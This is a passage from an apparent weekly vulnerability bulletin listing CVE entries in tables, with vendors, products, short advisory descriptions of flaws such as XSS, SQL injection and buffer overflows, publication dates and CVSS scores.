Multiple buffer overflow vulnerabilities exist in the qos.cgi qos_settings() functionality of Wavlink AC3000 M33A8.V5030.210505. A specially crafted HTTP request can lead to stack-based buffer overflow. An attacker can make an authenticated HTTP request to trigger these vulnerabilities.A buffer overflow vulnerability exists in the `sel_mode` POST parameter. | 2025-01-14 | 9.1 | CVE-2024-39803 |
| Web Ready Now--WR Price List Manager For Woocommerce |
Unrestricted Upload of File with Dangerous Type vulnerability in Web Ready Now WR Price List Manager For Woocommerce allows Upload a Web Shell to a Web Server.This issue affects WR Price List Manager For Woocommerce: from n/a through 1.0.8. | 2025-01-15 | 9.9 | CVE-2025-22782 |
| web-mv.de--ResAds |
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in web-mv.de ResAds allows SQL Injection.This issue affects ResAds: from n/a through 2.0.5. | 2025-01-16 | 7.6 | CVE-2025-23779 |
| wellwisher--Custom Widget Classes |
Cross-Site Request Forgery (CSRF) vulnerability in wellwisher Custom Widget Classes allows Cross Site Request Forgery.This issue affects Custom Widget Classes: from n/a through 1.1. | 2025-01-16 | 7.1 | CVE-2025-23844 |
| Wizcrew Technologies--go Social |
Cross-Site Request Forgery (CSRF) vulnerability in Wizcrew Technologies go Social allows Stored XSS.This issue affects go Social: from n/a through 1.0. | 2025-01-16 | 7.1 | CVE-2025-23426 |
| Wouter Dijkstra--DD Roles |
Incorrect Privilege Assignment vulnerability in Wouter Dijkstra DD Roles allows Privilege Escalation.This issue affects DD Roles: from n/a through 4.1. | 2025-01-16 | 8.8 | CVE-2025-23528 |
| WP Scripts--Food Store Online Food Delivery & Pickup |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in WP Scripts Food Store - Online Food Delivery & Pickup allows Reflected XSS.This issue affects Food Store - Online Food Delivery & Pickup: from n/a through 1.5.1. | 2025-01-13 | 7.1 | CVE-2025-22314 |
| WPExperts--User Management |
Incorrect Privilege Assignment vulnerability in WPExperts User Management allows Privilege Escalation.This issue affects User Management: from n/a through 1.2. | 2025-01-15 | 8.8 | CVE-2025-22736 |
| wpextended--The Ultimate WordPress Toolkit WP Extended |
The The Ultimate WordPress Toolkit - WP Extended plugin for WordPress is vulnerable to time-based SQL Injection via the Login Attempts module in all versions up to, and including, 3.0.12 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. | 2025-01-18 | 7.5 | CVE-2024-13184 |
| wpwebs Team - VA Jariwala--WP Post Corrector |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in wpwebs Team - VA Jariwala WP Post Corrector allows Reflected XSS.This issue affects WP Post Corrector: from n/a through 1.0.2. | 2025-01-15 | 7.1 | CVE-2025-22764 |
| X Villamuera--Visit Site Link enhanced |
Cross-Site Request Forgery (CSRF) vulnerability in X Villamuera Visit Site Link enhanced allows Stored XSS.This issue affects Visit Site Link enhanced: from n/a through 1.0. | 2025-01-16 | 7.1 | CVE-2025-23470 |
| xwiki--xwiki-platform |
XWiki Platform is a generic wiki platform offering runtime services for applications built on top of it. NOTE: The Realtime WYSIWYG Editor extension was **experimental**, and thus **not recommended**, in the versions affected by this vulnerability. It has become enabled by default, and thus recommended, starting with XWiki 16.9.0. A user with only **edit right** can join a realtime editing session where others, that where already there or that may join later, have **script** or **programming** access rights. This user can then insert **script rendering macros** that are executed for those users in the realtime session that have script or programming rights. The inserted scripts can be used to gain more access rights. This vulnerability has been patched in XWiki 15.10.2, 16.4.1 and 16.6.0-rc-1. Users are advised to upgrade. Users unable to upgrade may either disable the realtime WYSIWYG editing by disabling the ``xwiki-realtime`` CKEditor plugin from the WYSIWYG editor administration section or uninstall the Realtime WYSIWYG Editorextension (org.xwiki.platform:xwiki-platform-realtime-wysiwyg-ui). | 2025-01-14 | 9 | CVE-2025-23025 |
| Y'S corporation--STEALTHONE D220 |
OS command injection vulnerability exists in network storage servers STEALTHONE D220/D340 provided by Y'S corporation. An attacker who can access the affected product may execute an arbitrary OS command. | 2025-01-14 | 9.8 | CVE-2025-20055 |
| Y'S corporation--STEALTHONE D220 |
OS command injection vulnerability exists in network storage servers STEALTHONE D220/D340/D440 provided by Y'S corporation. A user with an administrative privilege who logged in to the web management page of the affected product may execute an arbitrary OS command. | 2025-01-14 | 7.2 | CVE-2025-20016 |
| Y'S corporation--STEALTHONE D220 |
SQL Injection vulnerability exists in STEALTHONE D220/D340 provided by Y'S corporation. An attacker who can access the affected product may obtain the administrative password of the web management page. | 2025-01-14 | 7.5 | CVE-2025-20620 |
| Yamna Tatheer--KNR Author List Widget |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Yamna Tatheer KNR Author List Widget allows Reflected XSS.This issue affects KNR Author List Widget: from n/a through 3.1.1. | 2025-01-13 | 7.1 | CVE-2025-22514 |
| Yonatan Reinberg of Social Ink--Custom Post Type Lockdown |
Cross-Site Request Forgery (CSRF) vulnerability in Yonatan Reinberg of Social Ink Custom Post Type Lockdown allows Privilege Escalation.This issue affects Custom Post Type Lockdown: from n/a through 1.11. | 2025-01-16 | 8.8 | CVE-2025-23530 |
| Zaantar--WordPress Logging Service |
Cross-Site Request Forgery (CSRF) vulnerability in Zaantar WordPress Logging Service allows Stored XSS.This issue affects WordPress Logging Service: from n/a through 1.5.4. | 2025-01-16 | 7.1 | CVE-2025-23510 |
| Zyxel--WBE530 firmware |
An improper privilege management vulnerability in the web management interface of the Zyxel WBE530 firmware versions through 7.00(ACLE.3) and WBE660S firmware versions through 6.70(ACGG.2) could allow an authenticated user with limited privileges to escalate their privileges to that of an administrator, enabling them to upload configuration files to a vulnerable device. | 2025-01-14 | 8.8 | CVE-2024-12398 |
Medium Vulnerabilities
| Primary Vendor -- Product |
Description | Published | CVSS Score | Source Info |
|---|---|---|---|---|
| 1000 Projects--Attendance Tracking Management System |
A vulnerability classified as critical was found in 1000 Projects Attendance Tracking Management System 1.0. This vulnerability affects unknown code of the file /admin/edit_action.php. The manipulation of the argument attendance_id leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. | 2025-01-17 | 6.3 | CVE-2025-0536 |
| 1902756969--reggie |
A vulnerability classified as critical was found in 1902756969 reggie 1.0. Affected by this vulnerability is the function upload of the file src/main/java/com/itheima/reggie/controller/CommonController.java. The manipulation of the argument file leads to unrestricted upload. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. | 2025-01-13 | 6.3 | CVE-2025-0402 |
| 1902756969--reggie |
A vulnerability classified as critical has been found in 1902756969 reggie 1.0. Affected is the function download of the file src/main/java/com/itheima/reggie/controller/CommonController.java. The manipulation of the argument name leads to path traversal. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. | 2025-01-13 | 5.3 | CVE-2025-0401 |
| 1902756969--reggie |
A vulnerability, which was classified as problematic, has been found in 1902756969 reggie 1.0. Affected by this issue is some unknown functionality of the file /user/sendMsg of the component Phone Number Validation Handler. The manipulation of the argument code leads to information disclosure. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. | 2025-01-13 | 5.3 | CVE-2025-0403 |
| addonsorg--PDF for WPForms + Drag and Drop Template Builder |
The PDF for WPForms + Drag and Drop Template Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's yeepdf_dotab shortcode in all versions up to, and including, 4.6.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-01-15 | 6.4 | CVE-2024-12593 |
| advancedcreation--ShipWorks Connector for Woocommerce |
The ShipWorks Connector for Woocommerce plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 5.2.5. This is due to missing or incorrect nonce validation on the 'shipworks-wordpress' page. This makes it possible for unauthenticated attackers to update the services username and password via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2025-01-18 | 4.3 | CVE-2024-13317 |
| AGILELOGIX--Free Google Maps |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in AGILELOGIX Free Google Maps allows Stored XSS.This issue affects Free Google Maps: from n/a through 1.0.1. | 2025-01-15 | 6.5 | CVE-2025-22329 |
| aiwp--Elementor AI Addons |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in aiwp Elementor AI Addons allows DOM-Based XSS.This issue affects Elementor AI Addons: from n/a through 2.2.1. | 2025-01-15 | 6.5 | CVE-2025-22758 |
| Albertolabs.com--Easy EU Cookie law |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Albertolabs.com Easy EU Cookie law allows Stored XSS.This issue affects Easy EU Cookie law: from n/a through 1.3.3.1. | 2025-01-16 | 6.5 | CVE-2025-23434 |
| Aleksandar Arsovski--Google Org Chart |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Aleksandar Arsovski Google Org Chart allows Stored XSS.This issue affects Google Org Chart: from n/a through 1.0.1. | 2025-01-16 | 6.5 | CVE-2025-23928 |
| Alessandro Staniscia--Simple Vertical Timeline |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Alessandro Staniscia Simple Vertical Timeline allows DOM-Based XSS.This issue affects Simple Vertical Timeline: from n/a through 0.1. | 2025-01-16 | 6.5 | CVE-2025-23856 |
| Alex Furr and Simon Ward--Progress Tracker |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Alex Furr and Simon Ward Progress Tracker allows DOM-Based XSS.This issue affects Progress Tracker: from n/a through 0.9.3. | 2025-01-16 | 6.5 | CVE-2025-23892 |
| Alex Thorpe--Easy Shortcode Buttons |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Alex Thorpe Easy Shortcode Buttons allows Stored XSS.This issue affects Easy Shortcode Buttons: from n/a through 1.2. | 2025-01-16 | 6.5 | CVE-2025-23825 |
| Alex Volkov--Woo Tuner |
Missing Authorization vulnerability in Alex Volkov Woo Tuner allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Woo Tuner: from n/a through 0.1.2. | 2025-01-16 | 5.4 | CVE-2025-23761 |
| Alexander Weleczka--FontAwesome.io ShortCodes |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Alexander Weleczka FontAwesome.io ShortCodes allows Stored XSS.This issue affects FontAwesome.io ShortCodes: from n/a through 1.0. | 2025-01-16 | 6.5 | CVE-2025-23824 |
| Alexey Yuzhakov--wp-pano |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Alexey Yuzhakov wp-pano allows Stored XSS.This issue affects wp-pano: from n/a through 1.17. | 2025-01-15 | 6.5 | CVE-2025-22780 |
| Anshi Solutions--Category D3 Tree |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Anshi Solutions Category D3 Tree allows Stored XSS.This issue affects Category D3 Tree: from n/a through 1.1. | 2025-01-16 | 6.5 | CVE-2025-23873 |
| Apache Software Foundation--Apache CloudStack |
CloudStack users can add and read comments (annotations) on resources they are authorised to access. Due to an access validation issue that affects Apache CloudStack versions from 4.16.0, users who have access, prior access or knowledge of resource UUIDs can list and add comments (annotations) to such resources. An attacker with a user-account and access or prior knowledge of resource UUIDs may exploit this issue to read contents of the comments (annotations) or add malicious comments (annotations) to such resources. This may cause potential loss of confidentiality of CloudStack environments and resources if the comments (annotations) contain any privileged information. However, guessing or brute-forcing resource UUIDs are generally hard to impossible and access to listing or adding comments isn't same as access to CloudStack resources, making this issue of very low severity and general low impact. CloudStack admins may also disallow listAnnotations and addAnnotation API access to non-admin roles in their environment as an interim measure. | 2025-01-13 | 4.3 | CVE-2025-22828 |
| Apache Software Foundation--Apache Linkis Metadata Query Service JDBC |
In Apache Linkis <1.7.0, due to the lack of effective filtering of parameters, an attacker configuring malicious Mysql JDBC parameters in the DataSource Manager Module will allow the attacker to read arbitrary files from the Linkis server. Therefore, the parameters in the Mysql JDBC URL should be blacklisted. This attack requires the attacker to obtain an authorized account from Linkis before it can be carried out. Versions of Apache Linkis < 1.7.0 will be affected. We recommend users upgrade the version of Linkis to version 1.7.0. | 2025-01-14 | 5.9 | CVE-2024-45627 |
| apple -- ipados |
A path handling issue was addressed with improved logic. This issue is fixed in watchOS 11.1, visionOS 2.1, iOS 18.1 and iPadOS 18.1. An attacker with access to calendar data could also read reminders. | 2025-01-15 | 4.3 | CVE-2024-54535 |
| Apple--Apple Music for Windows |
The issue was addressed with improved input sanitization. This issue is fixed in Apple Music 1.5.0.152 for Windows. Processing maliciously crafted web content may disclose internal states of the app. | 2025-01-15 | 5.5 | CVE-2024-54540 |
| Apple--iOS and iPadOS |
A logic issue was addressed with improved checks. This issue is fixed in iOS 18.1 and iPadOS 18.1, iOS 17.7.1 and iPadOS 17.7.1. An attacker with physical access may be able to access contacts from the lock screen. | 2025-01-15 | 4.6 | CVE-2024-54470 |
| Apple--macOS |
A memory initialization issue was addressed with improved memory handling. This issue is fixed in iOS 18.1 and iPadOS 18.1, iOS 17.7.1 and iPadOS 17.7.1, macOS Sonoma 14.7.1, macOS Ventura 13.7.1. An app may be able to cause unexpected system termination. | 2025-01-15 | 6.5 | CVE-2024-40854 |
| Arm--SCP-Firmware |
Specifically crafted SCMI messages sent to an SCP running SCP-Firmware release versions up to and including 2.15.0 may lead to a Usage Fault and crash the SCP | 2025-01-14 | 5.3 | CVE-2024-11863 |
| arul--PDF.js Shortcode |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in arul PDF.js Shortcode allows Stored XSS.This issue affects PDF.js Shortcode: from n/a through 1.0. | 2025-01-16 | 6.5 | CVE-2025-23943 |
| August Infotech--AI Responsive Gallery Album |
Missing Authorization vulnerability in August Infotech AI Responsive Gallery Album allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects AI Responsive Gallery Album: from n/a through 1.4. | 2025-01-16 | 4.3 | CVE-2025-23785 |
| AWcode & KingfisherFox--Salvador AI Image Generator |
Missing Authorization vulnerability in AWcode & KingfisherFox Salvador - AI Image Generator allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Salvador - AI Image Generator: from n/a through 1.0.11. | 2025-01-16 | 4.3 | CVE-2025-23954 |
| awordpresslife--Event Monster Event Management, Tickets Booking, Upcoming Event |
The Event Monster - Event Management, Tickets Booking, Upcoming Event plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 1.4.3 via the Visitors List Export file. During the export, a CSV file is created in the wp-content folder with a hardcoded filename that is publicly accessible. This makes it possible for unauthenticated attackers to extract data about event visitors, that includes first and last names, email, and phone number. | 2025-01-14 | 5.3 | CVE-2024-11396 |
| AwoThemes--Social Media Engine |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in AwoThemes Social Media Engine allows Stored XSS.This issue affects Social Media Engine: from n/a through 1.0.2. | 2025-01-15 | 6.5 | CVE-2025-22749 |
| barteled--Sandbox |
The Sandbox plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'debug' parameter in all versions up to, and including, 0.4 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2025-01-17 | 6.1 | CVE-2024-13366 |
| barteled--Sandbox |
The Sandbox plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on the export_download action in all versions up to, and including, 0.4. This makes it possible for authenticated attackers, with Subscriber-level access and above, to download an entire copy of a sandbox environment which can contain sensitive information like the wp-config.php file. | 2025-01-17 | 6.5 | CVE-2024-13367 |
| Bjrn Weinbrenner--Navigation Du Lapin Blanc |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Björn Weinbrenner Navigation Du Lapin Blanc allows DOM-Based XSS.This issue affects Navigation Du Lapin Blanc: from n/a through 1.1.1. | 2025-01-15 | 6.5 | CVE-2025-22745 |
| BlackBerry--QNX Software Development Platform (SDP) |
Off-by-one error in the TIFF image codec in QNX SDP versions 8.0, 7.1 and 7.0 could allow an unauthenticated attacker to cause an information disclosure in the context of the process using the image codec. | 2025-01-14 | 5.3 | CVE-2024-48854 |
| BlackBerry--QNX Software Development Platform (SDP) |
Out-of-bounds read in the TIFF image codec in QNX SDP versions 8.0, 7.1 and 7.0 could allow an unauthenticated attacker to cause an information disclosure in the context of the process using the image codec. | 2025-01-14 | 5.3 | CVE-2024-48855 |
| BnB Select Ltd--Bookalet |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in BnB Select Ltd Bookalet allows Stored XSS.This issue affects Bookalet: from n/a through 1.0.3. | 2025-01-16 | 6.5 | CVE-2025-23899 |
| boldgrid -- w3_total_cache |
The W3 Total Cache plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on several functions in all versions up to, and including, 2.8.1. This makes it possible for unauthenticated attackers to deactivate the plugin as well as activate and deactivate plugin extensions. | 2025-01-14 | 5.3 | CVE-2024-12006 |
| boldgrid -- w3_total_cache |
The W3 Total Cache plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 2.8.1 through the publicly exposed debug log file. This makes it possible for unauthenticated attackers to view potentially sensitive information in the exposed log file. For example, the log file may contain nonce values that can be used in further CSRF attacks. Note: the debug feature must be enabled for this to be a concern, and it is disabled by default. | 2025-01-14 | 5.3 | CVE-2024-12008 |
| BoldGrid--Post and Page Builder by BoldGrid Visual Drag and Drop Editor |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in BoldGrid Post and Page Builder by BoldGrid - Visual Drag and Drop Editor allows Stored XSS.This issue affects Post and Page Builder by BoldGrid - Visual Drag and Drop Editor: from n/a through 1.27.4. | 2025-01-15 | 6.5 | CVE-2025-22759 |
| bPlugins LLC--Button Block |
Missing Authorization vulnerability in bPlugins LLC Button Block allows Accessing Functionality Not Properly Constrained by ACLs.This issue affects Button Block: from n/a through 1.1.5. | 2025-01-15 | 4.3 | CVE-2025-22787 |
| bplugins--HTML5 Video Player mp4 Video Player Plugin and Block |
The HTML5 Video Player - mp4 Video Player Plugin and Block plugin for WordPress is vulnerable to DOM-Based Stored Cross-Site Scripting via the 'heading' parameter in all versions up to, and including, 2.5.35 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-01-14 | 6.4 | CVE-2024-13156 |
| brandondove--RSS Icon Widget |
The RSS Icon Widget plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'link_color' parameter in all versions up to, and including, 5.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level access, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled. | 2025-01-17 | 4.4 | CVE-2024-12203 |
| caido--caido |
Caido is a web security auditing toolkit. A Cross-Site Scripting (XSS) vulnerability was identified in Caido v0.45.0 due to improper sanitization in the URL decoding tooltip of HTTP request and response editors. This issue could allow an attacker to execute arbitrary scripts, potentially leading to the theft of sensitive information. This issue has been addressed in version 0.45.1 and all users are advised to upgrade. There are no known workarounds for this vulnerability. | 2025-01-17 | 5.2 | CVE-2025-23039 |
| carrotbits--Greek Namedays Widget From Eortologio.Net |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in carrotbits Greek Namedays Widget From Eortologio.Net allows Stored XSS.This issue affects Greek Namedays Widget From Eortologio.Net: from n/a through 20191113. | 2025-01-16 | 6.5 | CVE-2025-23783 |
| casid--jte |
jte (Java Template Engine) is a secure and lightweight template engine for Java and Kotlin. In affected versions Jte HTML templates with `script` tags or script attributes that include a Javascript template string (backticks) are subject to XSS. The `javaScriptBlock` and `javaScriptAttribute` methods in the `Escape` class do not escape backticks, which are used for Javascript template strings. Dollar signs in template strings should also be escaped as well to prevent undesired interpolation. HTML templates rendered by Jte's `OwaspHtmlTemplateOutput` in versions less than or equal to `3.1.15` with `script` tags or script attributes that contain Javascript template strings (backticks) are vulnerable. Users are advised to upgrade to version 3.1.16 or later to resolve this issue. There are no known workarounds for this vulnerability. | 2025-01-13 | 6.1 | CVE-2025-23026 |
| Chandrika Guntur, Morgan Kay--Chamber Dashboard Business Directory |
Missing Authorization vulnerability in Chandrika Guntur, Morgan Kay Chamber Dashboard Business Directory allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Chamber Dashboard Business Directory: from n/a through 3.3.8. | 2025-01-16 | 5.4 | CVE-2025-23917 |
| CHR Designer--Responsive jQuery Slider |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in CHR Designer Responsive jQuery Slider allows Stored XSS.This issue affects Responsive jQuery Slider: from n/a through 1.1.1. | 2025-01-15 | 6.5 | CVE-2025-22798 |
| Chris Roberts--Annie |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Chris Roberts Annie allows Stored XSS.This issue affects Annie: from n/a through 2.1.1. | 2025-01-16 | 6.5 | CVE-2025-23886 |
| chuck1982--WP Inventory Manager |
The WP Inventory Manager plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'message' parameter in all versions up to, and including, 2.3.2 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2025-01-17 | 6.1 | CVE-2024-13434 |
| closed--SOCIAL.NINJA |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in closed SOCIAL.NINJA allows Stored XSS. This issue affects SOCIAL.NINJA: from n/a through 0.2. | 2025-01-16 | 6.5 | CVE-2025-23907 |
| cmsmasters--Buzz Club Night Club, DJ and Music Festival Event WordPress Theme |
The Buzz Club - Night Club, DJ and Music Festival Event WordPress Theme theme for WordPress is vulnerable to unauthorized modification of data that can lead to a denial of service due to a missing capability check on the 'cmsmasters_hide_admin_notice' function in all versions up to, and including, 2.0.4. This makes it possible for authenticated attackers, with Subscriber-level access and above, to update option values to 'hide' on the WordPress site. This can be leveraged to update an option that would create an error on the site and deny service to legitimate users or be used to set some values to true such as registration. | 2025-01-18 | 4.3 | CVE-2025-0515 |
| code-projects--Chat System |
A vulnerability was found in code-projects Chat System 1.0 and classified as critical. This issue affects some unknown processing of the file /user/leaveroom.php. The manipulation of the argument id leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. | 2025-01-17 | 6.3 | CVE-2025-0531 |
| code-projects--Fantasy-Cricket |
A vulnerability was found in code-projects Fantasy-Cricket 1.0. It has been classified as critical. Affected is an unknown function of the file /dash/update.php. The manipulation of the argument uname leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. | 2025-01-19 | 6.3 | CVE-2025-0563 |
| code-projects--Train Ticket Reservation System |
A vulnerability, which was classified as critical, was found in code-projects Train Ticket Reservation System 1.0. This affects an unknown part of the component Login Form. The manipulation of the argument username leads to stack-based buffer overflow. Attacking locally is a requirement. The exploit has been disclosed to the public and may be used. | 2025-01-17 | 5.3 | CVE-2025-0529 |
| Codexpert, Inc--CoDesigner WooCommerce Builder for Elementor |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Codexpert, Inc CoDesigner WooCommerce Builder for Elementor allows Stored XSS.This issue affects CoDesigner WooCommerce Builder for Elementor: from n/a through 4.7.17.2. | 2025-01-15 | 5.9 | CVE-2025-22788 |
| Codezips--Gym Management System |
A vulnerability was found in Codezips Gym Management System 1.0. It has been classified as critical. Affected is an unknown function of the file /dashboard/admin/new_submit.php. The manipulation of the argument m_id leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. | 2025-01-17 | 6.3 | CVE-2025-0532 |
| Codezips--Gym Management System |
A vulnerability classified as critical has been found in Codezips Gym Management System 1.0. This affects an unknown part of the file /dashboard/admin/edit_mem_submit.php. The manipulation of the argument uid leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. | 2025-01-17 | 6.3 | CVE-2025-0535 |
| Codezips--Gym Management System |
A vulnerability was found in Codezips Gym Management System 1.0 and classified as critical. This issue affects some unknown processing of the file /dashboard/admin/edit_member.php. The manipulation of the argument name leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. Other parameters might be affected as well. | 2025-01-17 | 6.3 | CVE-2025-0541 |
| Codezips--Gym Management System |
A vulnerability was found in Codezips Gym Management System 1.0 and classified as critical. This issue affects some unknown processing of the file /dashboard/admin/health_status_entry.php. The manipulation of the argument usrid leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. | 2025-01-19 | 6.3 | CVE-2025-0562 |
| Common Ninja--Compare Ninja |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Common Ninja Compare Ninja allows Stored XSS.This issue affects Compare Ninja: from n/a through 2.1.0. | 2025-01-16 | 6.5 | CVE-2025-23909 |
| Creative Brahma--Multifox |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Creative Brahma Multifox allows Stored XSS.This issue affects Multifox: from n/a through 1.3.7. | 2025-01-15 | 6.5 | CVE-2025-22769 |
| Crocoblock--JetEngine |
The JetEngine plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'list_tag' parameter in all versions up to, and including, 3.6.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-01-18 | 6.4 | CVE-2025-0369 |
| D-Link--DIR-878 |
A vulnerability classified as problematic has been found in D-Link DIR-878 1.03. Affected is an unknown function of the file /dllog.cgi of the component HTTP POST Request Handler. The manipulation leads to information disclosure. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. | 2025-01-15 | 5.3 | CVE-2025-0481 |
| Data443--Posts Footer Manager |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Data443 Posts Footer Manager allows Stored XSS.This issue affects Posts Footer Manager: from n/a through 2.1.0. | 2025-01-15 | 5.9 | CVE-2025-22734 |
| davidanderson--UpdraftPlus: WP Backup & Migration Plugin |
The UpdraftPlus: WP Backup & Migration Plugin plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the showdata and initiate_restore parameters in all versions up to, and including, 1.24.12 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick an admin user into performing an action such as clicking on a link. | 2025-01-15 | 6.1 | CVE-2025-0215 |
| Dell--Dell Display Manager |
Dell Display Manager, versions prior to 2.3.2.20, contain a race condition vulnerability. A local malicious user could potentially exploit this vulnerability during installation, leading to arbitrary folder or file deletion. | 2025-01-15 | 6.6 | CVE-2025-21101 |
| Dell--Dell Display Manager |
Dell Display Manager, versions prior to 2.3.2.18, contain a Time-of-check Time-of-use (TOCTOU) Race Condition vulnerability. A low privileged attacker with local access could potentially exploit this vulnerability, leading to code execution and possibly privilege escalation. | 2025-01-15 | 6.7 | CVE-2025-22394 |
| desktop--desktop |
GitHub Desktop is an open-source Electron-based GitHub app designed for git development. An attacker convincing a user to clone a repository directly or through a submodule can allow the attacker access to the user's credentials through the use of maliciously crafted remote URL. GitHub Desktop relies on Git to perform all network related operations (such as cloning, fetching, and pushing). When a user attempts to clone a repository GitHub Desktop will invoke `git clone` and when Git encounters a remote which requires authentication it will request the credentials for that remote host from GitHub Desktop using the git-credential protocol. Using a maliciously crafted URL it's possible to cause the credential request coming from Git to be misinterpreted by Github Desktop such that it will send credentials for a different host than the host that Git is currently communicating with thereby allowing for secret exfiltration. GitHub username and OAuth token, or credentials for other Git remote hosts stored in GitHub Desktop could be improperly transmitted to an unrelated host. Users should update to GitHub Desktop 3.4.12 or greater which fixes this vulnerability. Users who suspect they may be affected should revoke any relevant credentials. | 2025-01-15 | 6.6 | CVE-2025-23040 |
| DivEngine--Gallery: Hybrid Advanced Visual Gallery |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in DivEngine Gallery: Hybrid - Advanced Visual Gallery allows Stored XSS.This issue affects Gallery: Hybrid - Advanced Visual Gallery: from n/a through 1.4.0.2. | 2025-01-16 | 6.5 | CVE-2025-23951 |
| djangoproject--Django |
An issue was discovered in Django 5.1 before 5.1.5, 5.0 before 5.0.11, and 4.2 before 4.2.18. Lack of upper-bound limit enforcement in strings passed when performing IPv6 validation could lead to a potential denial-of-service attack. The undocumented and private functions clean_ipv6_address and is_valid_ipv6_address are vulnerable, as is the django.forms.GenericIPAddressField form field. (The django.db.models.GenericIPAddressField model field is not affected.) | 2025-01-14 | 5.8 | CVE-2024-56374 |
| Eiji Sabaoh Yamada--Rollover Tab |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Eiji 'Sabaoh' Yamada Rollover Tab allows Stored XSS.This issue affects Rollover Tab: from n/a through 1.3.2. | 2025-01-16 | 6.5 | CVE-2025-23863 |
| Ella van Durpe--Slides & Presentations |
Improper Neutralization of Script-Related HTML Tags in a Web Page (Basic XSS) vulnerability in Ella van Durpe Slides & Presentations allows Code Injection.This issue affects Slides & Presentations: from n/a through 0.0.39. | 2025-01-16 | 5.4 | CVE-2025-23919 |
| Epic Games--Launcher |
A vulnerability classified as problematic was found in Epic Games Launcher up to 17.2.1. This vulnerability affects unknown code in the library profapi.dll of the component Installer. The manipulation leads to untrusted search path. Attacking locally is a requirement. The complexity of an attack is rather high. The exploitation appears to be difficult. | 2025-01-19 | 4.5 | CVE-2025-0567 |
| eteubert--Podlove Podcast Publisher |
